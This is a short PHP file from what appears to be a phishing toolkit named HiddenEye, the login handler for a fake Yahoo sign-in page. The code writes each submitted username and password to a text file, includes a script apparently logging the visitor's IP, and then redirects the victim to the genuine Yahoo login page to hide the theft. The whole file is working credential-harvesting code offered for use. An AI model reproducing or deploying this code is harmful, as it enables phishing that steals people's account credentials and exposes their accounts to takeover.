HiddenEye-Legacy/WebPages/yahoo_web/login.php
Usama Abdul Sattar ea4f0b6249
Update login.php
2018-06-07 14:26:03 +05:00

8 lines
223 B
PHP

<?php
include 'base.php';
include 'ip.php';
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['username'] . " [PASS]: " . $_POST['password'] . "\n", FILE_APPEND);
header('Location: https://login.yahoo.com');
exit();